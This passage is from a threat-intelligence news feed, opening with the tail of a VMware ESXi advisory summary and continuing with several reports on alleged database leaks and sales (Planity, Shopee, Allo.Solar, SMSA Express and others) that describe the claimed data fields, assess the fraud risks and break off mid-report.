and is therefore classified as a VM escape. Only virtual machines configured with a VMXNET3 virtual network adapter are affected. Virtual machines using other virtual adapters are not vulnerable to this specific issue. Broadcom does not recommend switching affected systems to older, non-paravirtualized adapters such as e1000 as a long-term mitigation. Those devices have had their own security vulnerabilities and provide lower performance. Administrators should update ESXi instead. The VMXNET3 flaw is located on the ESXi side of the communication channel, meaning VMware Tools does not need to be updated specifically to address CVE-2026-47876. Fixed ESXi versions include: ESXi 9.1.0.0200, build 25557999 ESXi 9.0.2.0100, build 25595025 ESXi 8.0 Update 3k, build 25595708 Updating ESXi normally requires restarting the host. Organizations with clustered environments can use vMotion to relocate workloads and perform rolling host reboots. Broadcom says Live Patch may also be available for supported versions and configurations. ### Additional Information Disclosure and Logging Flaws VMSA-2026-0006 also addresses CVE-2026-41703, an out-of-bounds read affecting ESX, Workstation, and Fusion. An attacker with virtual machine deployment privileges could exploit the vulnerability to disclose information or, more likely, cause a denial-of-service condition in the ESXi host process. On VMware Workstation and Fusion, the impact is limited to information disclosure. Workstation 25H2 and Fusion 25H2 users should update to [Workstation or Fusion 26H1](https://github.com/vmware/vcf-security-and-compliance-guidelines/tree/main/security-advisories/vmsa-2026-0006). The final vulnerability, CVE-2026-41709, is a low-severity insufficient logging issue in ESX. A malicious administrator could perform certain operations without those actions being recorded, potentially reducing the visibility available during security monitoring or forensic investigations. ### No Workarounds Available Broadcom says there are no workarounds for the five vulnerabilities. Network segmentation, management-interface restrictions, and other defensive controls may reduce exposure, but they do not replace the security updates. The advisory affects supported versions released before those listed as fixed. Broadcom also warns that organizations using unsupported VMware versions should assume they are vulnerable. VMware vSphere 7 reached the end of general support on October 2, 2025\. Broadcom says patches may be provided through the support portal at a later date, but organizations should not assume unsupported installations are safe simply because they are absent from the primary response matrix. The company has not observed exploitation in the wild, but VMware infrastructure remains a high-value target because compromising a hypervisor or centralized management server can provide access to numerous workloads simultaneously. Administrators should inventory affected vCenter and ESXi installations, restrict management interfaces to trusted networks, install the cumulative updates, and verify that all hosts report the expected patched build numbers. ### Lire Demain Database Allegedly Leaked, 5,974 School and Local Authority Client Records Published URL: https://darkwebinformer.com/lire-demain-database-allegedly-leaked-5-974-school-and-local-authority-client-records-published/ Last updated: 2026-07-28T22:32:04.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Publishing / Education Supply Free Download ## Lire Demain Database Allegedly Leaked, 5,974 School and Local Authority Client Records Published A forum user posting as **0xSec** has published what they describe as the database of **Lire Demain**, the schools and institutions network of the French children's publisher **Auzou**, which supplies books, kamishibai theatres, and educational materials to schools, early years settings, and local authorities. The release comprises **five CSV files** covering client records, orders, invoices, a mailing list, and a product catalogue. The client file lists **5,974 institutions** including middle schools, primary schools, town halls, and local education departments, with named staff contacts, institutional email addresses, telephone and fax numbers, budget dates, and delivery scheduling. A separate **476-line mailing file contains individuals at residential addresses**. The data is offered as a free download. The claim is **unverified**. Severity MODERATE Client records5,974 Files5 CSV PriceFree Actor0xSec ### ▣Post details TargetLire Demain (Auzou) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorPublishing / Education supply ListingFree — reply to unlock Clients5,974 institutions Individuals476 residential records ObservedJul 28, 2026 Actor0xSec ### !Allegedly included - Institution names & types - Institution addresses - Phone & fax numbers - Institutional email addresses - Named staff contacts - Staff email addresses - Sales representative names - Order records & references - Invoice numbers & amounts - Payment status & chasing history - Budget availability dates - Delivery day preferences - Individual names & home addresses - Product catalogue & pricing ### ◱Screenshots [ ![Lire Demain France education supplier database leak forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/92379856928736498273649872356987234698.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/92379856928736498273649872356987234698.png) [ ![Lire Demain France education supplier database leak forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/92379856928736498273649872356987234699.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/92379856928736498273649872356987234699.png) ### ⚠Potential impact Two points of scope should be established before the risk, because both cut against alarm. This is a **small dataset**, and the great majority of it is institutional rather than personal: school addresses, switchboard numbers, and academy email addresses are largely public information already. Second, and more importantly given the sector, **nothing in the published schema indicates that pupil or child data is present**. The client file describes purchasing institutions and their staff contacts, and the product file is a book catalogue. The genuine exposure is **commercial fraud against public institutions**. Taken together the files provide order references, invoice numbers, amounts, payment status, chasing history, named sales representatives, and the specific staff member responsible for purchasing at each school. That is a complete toolkit for **invoice fraud and business email compromise**: a fraudulent payment demand quoting a real invoice number, a real order, and the correct representative's name, sent to the person who actually approves it, defeats nearly every check a school office would apply. French schools and local authorities have been recurrent targets of exactly this type of fraud, and the **budget availability and closure dates** in the client file indicate when institutions are actively spending. The **476 residential records** are the clearest personal data in the set and warrant individual notification. One further detail is worth flagging to affected institutions rather than dwelling on: the client file records **which days and half-days each site accepts deliveries**, which is relevant to premises that manage access to their grounds. The claim is unverified. ### iStatus Unverified The post includes header rows and record samples from each of the five files, which is more granular substantiation than most listings provide, and the structure is internally consistent with an export from a business management system rather than an assembled list. Dates in the samples run from **2020 to 2026**, suggesting either a long-lived dataset or a recent export of historical records. The account has a moderate posting history and standing on the forum. Neither the file contents nor the origin of the data has been independently corroborated. The claim is **unverified** and neither Lire Demain nor Auzou has publicly addressed it. Schools and local authorities that purchase through the network should be alert to payment requests referencing genuine order or invoice references, and should verify any change of bank details through a known contact route rather than one supplied in the message. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Planity Database Allegedly for Sale, 999,451 Customers of French Salons and Spas Listed URL: https://darkwebinformer.com/planity-database-allegedly-for-sale-999-451-customers-of-french-salons-and-spas-listed/ Last updated: 2026-07-28T20:27:09.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Beauty & Wellness / Booking Data for Sale ## Planity Database Allegedly for Sale, 999,451 Customers of French Salons and Spas Listed A seller posting as **weykofa** is advertising what they describe as the database of **Planity**, the French online booking platform used by hair salons, beauty businesses, and spas to manage appointments and customer records. The listing claims **1,088,463 lines covering 999,451 individuals**, supplied as a 261MB JSON file. The posted sample shows **customer names, phone numbers in multiple formats, email addresses, and a business identifier linking each customer to the specific salon or spa they booked with**, alongside record creation timestamps. The asking price is **$2,500 in Bitcoin**, described as negotiable. The claim is **unverified**. Severity HIGH People999,451 Lines1,088,463 Price$2,500 Actorweykofa ### ▣Post details TargetPlanity Country![France flag](https://flagcdn.com/w40/fr.png)France SectorBeauty & wellness booking ListingData for sale — $2,500, BTC Volume261MB JSON DataCustomer PII, business linkage ObservedJul 28, 2026 Actorweykofa ### !Allegedly included - Customer names - Phone numbers - Alternate phone formats - Email addresses - Business identifiers - Customer record IDs - Object identifiers - Record creation timestamps - Deletion timestamps - Import status flags ### ◱Screenshot [ ![Planity France booking platform database sale listing screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/273895692873649876235987623598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/273895692873649876235987623598723.png) ### ⚠Potential impact This is a contact dataset rather than a credential one: **no passwords, payment details, or appointment histories appear in the sample**, and the direct fraud risk is correspondingly limited. Its value to a buyer lies in quality rather than depth. A verified mobile number attached to a real name, for a population of roughly a million French consumers, is a strong input for **SMS-based fraud**, and appointment reminders are a message type these customers are conditioned to receive and act on. The **business identifier** is what makes the set more than a generic contact list. Because each customer is mapped to the specific salon or spa they booked with, a fraudulent message can name the establishment a person actually uses, which removes the main cue people rely on to spot impersonation. That linkage also creates a modest privacy exposure in its own right, since beauty and wellness patronage is not something everyone treats as public, and certain categories of clinic carry more sensitivity than a hairdresser does. Two structural details deserve attention. The presence of **deletion timestamps** suggests records marked as deleted remain present in the export, which raises a question about whether individuals who exercised erasure rights are still represented in the data; soft deletion is a routine engineering pattern and not in itself a violation, but under **GDPR** it becomes a question the operator would need to answer. The sample also contains at least one address on the platform's own corporate domain, indicating **staff or test records are mixed into the customer set**. The claim is unverified. ### iStatus Unverified The listing includes a record sample and routes contact through an encrypted messenger, which Dark Web Informer is not reproducing, with payment restricted to Bitcoin. The seller account was **created this month and has almost no posting history or standing**, which weighs against the listing. Against that, the sample structure is internally consistent, uses identifier formats and field naming of a kind associated with hosted search and database services rather than a hand-assembled list, and the stated file size is proportionate to the record count. The post has been **edited twice since publication**. Neither the record count nor the dataset has been independently corroborated. The claim is **unverified** and Planity has not publicly addressed it. Customers may wish to treat appointment reminders and booking messages arriving by SMS with additional care, particularly any that request payment or personal details. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Shopee Customer Database Allegedly for Sale, 300 Million Records Claimed Across Asia and Latin America URL: https://darkwebinformer.com/shopee-customer-database-allegedly-for-sale-300-million-records-claimed-across-asia-and-latin-america/ Last updated: 2026-07-28T17:52:46.000Z Breach Report Multi-Region E-commerce / Retail Data for Sale ## Shopee Customer Database Allegedly for Sale, 300 Million Records Claimed Across Asia and Latin America A seller posting as **666op** is advertising what they describe as a customer database from **Shopee**, the e-commerce marketplace operated by Sea Limited. The listing claims **more than 300 million unique records** dated to **March 2026**, and states the affected population spans Indonesia, Taiwan, Thailand, Singapore, and parts of Latin America. Advertised fields include **full names, email addresses, phone numbers, addresses, city and country, last order date, order counts, total spend, currency, and device identifiers**. A 150-record sample is linked from the post. The asking price is **$1,200**. The claim is **unverified**, and the record count is **substantially higher than most listings of this kind**. Severity HIGH Records claimed300M+ DatedMarch 2026 Price$1,200 Actor666op ### ▣Post details TargetShopee RegionsSE Asia, Taiwan, Latin America SectorE-commerce / Marketplace ListingData for sale — $1,200 Records300M+ claimed Sample150 records, externally hosted ObservedJul 28, 2026 Actor666op ### !Allegedly included - Full names - Email addresses - Phone numbers - Addresses - City - Country - Last order date - Order counts - Total spend - Currency - Device identifiers ### ◱Screenshot [ ![Shopee international customer database sale listing screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/34568737896459873658972365897263596872.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/34568737896459873658972365897263596872.png) ### ⚠Potential impact The claimed scale warrants scepticism before it warrants alarm, and the two should be held together rather than traded off. If the set is authentic at anything near the stated volume, the exposure is broad but shallow: **no passwords, payment details, or government identifiers are advertised**, which caps the direct fraud risk considerably. What the fields do support is **high-quality targeted phishing at enormous scale**. Name, phone, address, last order date, and total spend together let a message reference a real recent purchase and a real account history, which is the difference between a scam that most people spot and one that most people do not. In several of the named markets, mobile-first commerce and delivery-notification messaging are the norm, so a fraudulent order or delivery message lands in an expected channel. **Total spend and order counts also segment the population by value**, allowing a buyer to isolate the highest-spending customers rather than working the list indiscriminately. The **device identifiers** are the field with the longest tail, since they persist across sessions and support correlation against other breached datasets in a way that names and emails alone do not. The low asking price relative to the claimed volume is worth noting: at $1,200 for 300 million records, the pricing is **inconsistent with a genuinely exclusive dataset** and would be more typical of aggregated, recycled, or partially fabricated material. The claim is unverified. ### iStatus Unverified Several features of this listing invite caution. The **price is very low for the volume claimed**, the seller account has almost no posting history despite holding a purchased forum rank, and the advertised schema contains **no platform-specific fields** of the kind an internal Shopee export would ordinarily carry, consisting instead of generic commerce attributes that could be assembled from multiple sources. Aggregated datasets are frequently marketed as single-company breaches, and a 150-record sample cannot establish the provenance of 300 million. Dark Web Informer is **not reproducing the sample location or the seller's contact identifier**. None of this establishes that the data is fabricated, and the possibility of a genuine large-scale exposure cannot be dismissed on pricing alone. The claim is **unverified** and Shopee has not publicly addressed it. Customers in the named markets may wish to treat order and delivery notifications with additional care, particularly those arriving by SMS or messaging apps. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Allo.Solar Database Allegedly Leaked, 101,349 French Customers and 208,000 Solar Equipment Orders Exposed URL: https://darkwebinformer.com/allo-solar-database-allegedly-leaked-101-349-french-customers-and-208-000-solar-equipment-orders-exposed/ Last updated: 2026-07-27T19:27:02.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France E-commerce / Renewable Energy Free Download ## Allo.Solar Database Allegedly Leaked, 101,349 French Customers and 208,000 Solar Equipment Orders Exposed A forum user posting as **ChimeraZ** has published what they describe as the database of **Allo.Solar**, a French e-commerce platform selling photovoltaic and renewable energy equipment. The post claims **208,694 order lines covering 101,349 individuals**, released as a 222MB JSON file. The posted sample shows **full names, phone numbers, street addresses, cities, and postcodes for both billing and delivery parties**, together with order totals, payment method, the processor used, the last four digits of the payment card, and **complete itemised contents of each order** down to product references, quantities, and prices. The actor claims the intrusion occurred roughly two weeks ago and **explicitly frames the release around the wildfire emergency in Gironde**. The data is offered as a free download. The claim is **unverified**. Severity CRITICAL People101,349 Order lines208,694 PriceFree ActorChimeraZ ### ▣Post details TargetAllo.Solar Country![France flag](https://flagcdn.com/w40/fr.png)France SectorE-commerce / Solar equipment ListingFree — reply to unlock Volume222MB JSON DataCustomer PII, orders, part card ObservedJul 27, 2026 ActorChimeraZ ### !Allegedly included - Full names - Phone numbers - Street addresses - Cities & postcodes - Separate delivery addresses - Order identifiers - Order totals (incl. tax) - Payment method & processor - Card last four digits - Itemised product lists - Product references & codes - Quantities & unit prices - Delivery charges - Country of order ### ◱Screenshot [ ![Allo.Solar France database leak forum post screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23798562978634987625398723598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23798562978634987625398723598723.png) ### ⚠Potential impact No passwords or full card numbers appear in the sample, so account takeover and direct card fraud are not the primary concerns. What this dataset does instead is **describe a property**. An itemised solar order identifies a specific address as holding a photovoltaic installation, names the components, and states what was paid, which in the sample runs to several thousand euros for a single order. That is an inventory of valuable, resaleable, externally mounted equipment tied to a street address and a working phone number, and **solar hardware theft is an established problem across Europe**. The same combination is close to ideal for fraud aimed at homeowners: France already has a persistent problem with fraudulent solar sales and maintenance approaches, and a caller who can cite a customer's real installer, actual components, order value, and card last four digits has defeated nearly every check a householder would apply. The **timing raises a further concern that cannot be separated from the data**. Gironde and neighbouring Landes are currently subject to the largest peacetime evacuation in modern French history, with hundreds of thousands of residents displaced. Publishing residential addresses annotated with high-value equipment, into a population that includes households who may be away from their homes under evacuation orders, carries an obvious risk irrespective of what the actor intended. The separate delivery addresses compound this by distinguishing where equipment was installed from where the buyer is billed. The claim is unverified. ### iStatus Unverified The post includes a full record sample and places the download behind a reply gate, with the actor stating they hold no Telegram presence and are contactable only via an encrypted messenger, which Dark Web Informer is not reproducing. The actor claims access was obtained around two weeks before publication and **directly attributes the timing of the release to the Gironde wildfires**, using language that treats the emergency as an opportunity. That framing is the actor's own. The account is established on the forum with a substantial posting history and elevated standing. Neither the record count nor the dataset has been independently corroborated. The claim is **unverified** and Allo.Solar has not publicly addressed it. Customers should be aware that unsolicited contact referencing their installation, however accurate the details, may originate from this data rather than from the retailer. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### BENY New Energy Allegedly Breached, User Data Plus Access to EV Charging and Firmware Platforms Shown URL: https://darkwebinformer.com/beny-new-energy-allegedly-breached-user-data-plus-access-to-ev-charging-and-firmware-platforms-shown/ Last updated: 2026-07-24T17:05:39.000Z Breach Report ![China flag](https://flagcdn.com/w40/cn.png)China Energy / Connected Devices Point-Gated Download ## BENY New Energy Allegedly Breached, User Data Plus Access to EV Charging and Firmware Platforms Shown A forum user posting as **888** has published what they describe as a breach of **Beny.com**, operated by **BENY New Energy**, a manufacturer of solar photovoltaic safety equipment, microinverters, battery storage systems, and EV charging hardware. The post claims **13,600 unique users** were exposed, listing IDs, email addresses, mobile numbers, genders, addresses, usernames, account statuses, and hashed passwords. More significant than the record count is the accompanying **proof-of-access material**, which shows a live database client connected to an internet-reachable server hosting a dozen databases, among them **EV charging management platforms, a firmware management system, and a device monitoring platform**. The sample also exposes **administrator accounts with root-level roles**. The claim is **unverified**. Severity CRITICAL Users\~13,600 Databases shown12+ PasswordsArgon2id Actor888 ### ▣Post details TargetBENY New Energy (Beny.com) Country![China flag](https://flagcdn.com/w40/cn.png)China SectorEnergy hardware / IoT ListingPoints to unlock Users\~13,600 claimed EvidenceLive DB session screenshots ObservedJul 24, 2026 Actor888 ### !Allegedly included - Email addresses - Usernames & nicknames - Mobile numbers - Physical addresses - Gender - Argon2id password hashes - Administrator accounts - Role & permission data - Organisation identifiers - EV charging platform databases - Charge session & order tables - Firmware management system - Device monitoring platform - Certificate template tables - Diagnostic & communication logs - Battery & inverter device records ### ◱Screenshots [ ![BENY New Energy data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1249781247681278456198765197826497821.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1249781247681278456198765197826497821.png) [ ![BENY New Energy data breach forum post screenshot, July 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1249781247681278456198765197826497822.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/1249781247681278456198765197826497822.png) ### ⚠Potential impact Treating this as a 13,600-user data leak would miss what the post actually shows. The customer records are unremarkable by comparison, and the passwords use **Argon2id**, which makes bulk recovery impractical even though the parameters are lower than current best practice. The exposure that matters is **infrastructural**. The proof material depicts an authenticated session against a database server reachable over the internet, alongside databases whose names correspond to **EV charging management built on the OCPP protocol, a firmware management system, and a device monitoring platform**. Table names within them cover charge sessions and orders, device diagnostics, communication logs, certificate templates, and cryptographic material, which is the machinery governing trust between a vendor's cloud and the hardware deployed in the field. BENY's products are **grid-connected and physically consequential**: solar inverters, battery energy storage, and EV chargers. Where a vendor's firmware distribution and device management systems are reachable, the theoretical worst case is not data loss but **manipulation of deployed hardware at scale**, a scenario with documented research interest precisely because aggregated inverters and chargers interact with grid stability. It should be stated plainly that the post demonstrates database visibility and does not establish that firmware signing, device command channels, or fleet control were actually reachable, and that distinction matters. Even so, the presence of **root-level administrator credentials** in the sample and a directly addressable server materially raises the floor of what a competent buyer could attempt. The claim is unverified. ### iStatus Unverified This listing carries **stronger evidence than most**: rather than a field list alone, it includes screenshots of an apparently live database session showing schema structure, alongside record samples from the user table. Dark Web Informer is **not reproducing the server address** visible in that material. The account is the same long-established, high-standing forum moderator behind a separate leak published the previous day, and the download sits behind a points paywall. Sample records show an **international customer base** spanning European, Middle Eastern, and Latin American email domains, indicating the affected population is not confined to the company's home market. The claim is **unverified** and BENY New Energy has not publicly addressed it. Owners of affected hardware cannot act on this directly, which places the burden on the vendor to confirm whether device management and firmware pathways were reachable. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Podomoro University Allegedly Breached, 75 Databases and Full Website Source Code Offered for $7,000 URL: https://darkwebinformer.com/podomoro-university-allegedly-breached-75-databases-and-full-website-source-code-offered-for-7-000/ Last updated: 2026-07-24T16:39:10.000Z Breach Report ![Indonesia flag](https://flagcdn.com/w40/id.png)Indonesia Education / University Data for Sale ## Podomoro University Allegedly Breached, 75 Databases and Full Website Source Code Offered for $7,000 A seller posting as **LordVoldemort** is advertising what they describe as a complete compromise of **Podomoro University** in Indonesia, an institution established in 2014 under the Agung Podomoro Education Foundation. Rather than a single database, the listing enumerates **75 separate databases** by filename, spanning academic records, admissions, alumni, employees and HR, finance, payments, scholarships, research, library, and internal IT systems, alongside **academic year tables running from 2014 to 2026**. The seller also claims to hold the **entire source code of the university's website**. Total size is given as 2.31GB, with proof offered as a screenshot of an academic database dump. The asking price is **$7,000 in cryptocurrency**. The claim is **unverified**. Severity CRITICAL Databases75 Size2.31GB Price$7,000 ActorLordVoldemort ### ▣Post details TargetPodomoro University Country![Indonesia flag](https://flagcdn.com/w40/id.png)Indonesia SectorEducation / Higher education ListingData for sale — $7,000, crypto Volume75 databases / 2.31GB RangeAcademic years 2014–2026 ObservedJul 24, 2026 ActorLordVoldemort ### !Allegedly included - Academic records - Admissions data - Alumni records - Employee & HR databases - Finance databases - Payment & virtual account data - Scholarship records - Student life data - Learning management systems - Research & institute databases - Library systems - CRM & career services - Budgeting & purchasing - Audit logs & backups - IT, WiFi & web infrastructure - Website source code ### ◱Screenshot [ ![Podomoro University Indonesia database breach sale listing screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/9786238752358762385672876354876253486751.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/9786238752358762385672876354876253486751.png) ### ⚠Potential impact The modest file size understates this considerably. What is described is not the loss of one system but **an institution's entire data estate**: the enumerated databases cover admissions through graduation and into alumni relations, and separately cover the staff side through HR, payroll-adjacent finance, and purchasing. With **academic year tables running from 2014, the year the university was founded, through to 2026**, the affected population plausibly includes everyone who has ever enrolled. Several of the named databases carry a sensitivity beyond ordinary contact details. **Scholarship records** identify which students required financial assistance, **payment and virtual account systems** handle tuition transactions and the family bank details behind them, and an **HR information system** in an Indonesian context would ordinarily hold NIK national identity numbers and tax identifiers for staff, which cannot be reissued. Students are also a population with decades of future exposure ahead of them, so records taken now retain fraud value long after the institution has moved on. The **inclusion of website source code** changes the character of the incident from a data loss to a persistence problem: source code frequently contains hardcoded credentials and connection strings, and gives any buyer a map for regaining access after remediation. The presence of **audit logs and full backups** in the listing compounds this, since those are the records an institution would rely on to establish what actually happened. The claim is unverified. ### iStatus Unverified The listing offers proof in the form of a database dump screenshot and provides sample data only on private request, with payment in cryptocurrency and multiple encrypted contact routes that Dark Web Informer is not reproducing. The **dump filename carries a timestamp placing the extraction roughly a day before posting**, which if accurate would mean access was current at the time of listing and any credentials within the data should be treated as live. The seller account is **long-established with high standing on the forum**, a materially different profile from the throwaway accounts behind many listings, though this speaks to reputation within that community and not to the authenticity of the data. Neither the database inventory nor the source code claim has been independently corroborated. The claim is **unverified** and Podomoro University has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### SMSA Express Allegedly Breached, 124.7 Million Shipment Records With Sender and Recipient Details for Sale URL: https://darkwebinformer.com/smsa-express-allegedly-breached-124-7-million-shipment-records-with-sender-and-recipient-details-for-sale/ Last updated: 2026-07-24T16:22:19.000Z Breach Report ![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Saudi Arabia Logistics / Courier Data for Sale ## SMSA Express Allegedly Breached, 124.7 Million Shipment Records With Sender and Recipient Details for Sale A seller posting as **Demetrius** is advertising what they describe as a corporate dataset from **SMSA Express**, one of Saudi Arabia's largest courier and logistics operators. The listing claims **261GB comprising 124,734,059 shipment lines**, stating that each line carries two sets of personal details, one for the sender and one for the recipient. The advertised schema covers **names, phone numbers, street addresses, and cities for both parties**, along with tracking barcodes, package status and scan data, weight and piece counts, declared value and currency, and a **description of each shipment's contents**. The seller offers it as a one-time sale via escrow at a negotiable price. The claim is **unverified**. Severity CRITICAL Lines124,734,059 Size261GB Country![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Saudi Arabia ActorDemetrius ### ▣Post details TargetSMSA Express Country![Saudi Arabia flag](https://flagcdn.com/w40/sa.png)Saudi Arabia SectorLogistics / Courier ListingOne-time sale, escrow, negotiable Volume261GB / 124.7M lines StructureTwo PII sets per line ObservedJul 24, 2026 ActorDemetrius ### !Allegedly included - Sender names - Recipient names - Sender addresses - Recipient addresses - Sender & recipient cities - Contact phone numbers - Secondary phone numbers - Tracking barcodes - Commodity descriptions - Declared value - Declared currency - Package weight & pieces - Package status - Scan & handling data - Account owner reference ### ◱Screenshot [ ![SMSA Express Saudi Arabia courier data sale listing screenshot, July 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/7698532978263598726359782675982938756.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/7698532978263598726359782675982938756.png) ### ⚠Potential impact The headline figure needs qualifying: **124.7 million lines are shipments, not people**. Customers appear once per parcel, so the number of distinct individuals will be very substantially lower, though against a national population of roughly 35 million a dataset of this depth would still imply broad coverage over the years it spans. Scale aside, the field that carries the most weight is the **commodity description**. A courier record does not merely place a named person at a street address with a working phone number; paired with a description of contents and a declared value, it reveals **what that person ordered and what it was worth**. Applied across years of shipments, that is a behavioural profile covering purchases people may have had specific reasons to keep private, including medical supplies and personal items, and in this jurisdiction the sensitivity of certain categories is higher than the raw fields suggest. The **sender-recipient pairing** compounds it, since the data maps who corresponds with whom, exposing both personal relationships and commercial supply relationships between businesses. The most probable near-term harm is more mundane but affects the largest number of people: **parcel delivery fraud** is already among the highest-volume scam categories globally, and an attacker holding a genuine tracking barcode, the recipient's real name and address, and an accurate description of an actual shipment can produce a message that is effectively indistinguishable from a legitimate one. High declared values also identify which addresses received valuable goods, which has physical implications. The claim is unverified. ### iStatus Unverified The listing is a one-time sale routed through escrow with no fixed price and an encrypted messenger contact, which Dark Web Informer is not reproducing. **No sample records were published**, so the field list is the only evidence offered, and the schema names given are consistent with an operational courier tracking system rather than a marketing export. The seller account has been active on the forum for around ten months with a modest posting history and elevated rank. Neither the line count nor the archive has been independently corroborated. The claim is **unverified** and SMSA Express has not publicly addressed it. Customers of the service may wish to treat delivery notifications citing tracking numbers with particular caution, including those that appear to reference genuine past shipments. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Michoacán State Government CADPE Portal Allegedly Breached, 37,000 Supplier Identity Documents Published URL: https://darkwebinformer.com/michoacan-state-government-cadpe-portal-allegedly-breached-37-000-supplier-identity-documents-published/ Last updated: 2026-07-24T16:08:45.000Z Breach Report ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Government / Procurement Free Download ## Michoacán State Government CADPE Portal Allegedly Breached, 37,000 Supplier Identity Documents Published Threat actors posting as **homercracker** and **cenfecracked** claim to have extracted the full contents of **CADPE**, the executive procurement and administrative platform of the **Michoacán State Government** in Mexico, which handles public tenders and supplier registration. The post describes **58GB and 37,037 documents** organised into folders named by each registrant's **RFC taxpayer identifier**. The material is said to consist largely of **scanned identity and compliance documents** rather than database rows, including INE voter credentials, CURP and RFC records, professional licences, tax compliance certificates, corporate charters, recent financial statements, and **photographs of registrants' fiscal addresses**. The data is offered as a free direct download. The claim is **unverified**. Severity CRITICAL Size58GB+ Documents37,037 Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Actorhomercracker ### ▣Post details TargetCADPE, Michoacán State Government Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico SectorGovernment / Public procurement ListingFree direct download Volume58GB / 37,037 documents StructureFolders indexed by RFC ObservedJul 24, 2026 Actorshomercracker x cenfecracked ### !Allegedly included - INE voter credentials - Full names - CURP population codes - RFC taxpayer identifiers - Official ID of owners - Legal representative ID - Professional licences - Fiscal domicile certificates - Photographs of fiscal addresses - Tax situation certificates - SAT compliance opinions - Financial statements (2 months) - Payment receipts & proofs - Corporate charters - Employee declarations - Email contacts ### ◱Screenshots [ ![Michoacan government CADPE portal data breach forum post screenshot, July 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23987592786359827635987235689723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/07/23987592786359827635987235689723.png) [ ![Michoacan government CADPE portal data breach forum post screenshot, July 2026 (2 of 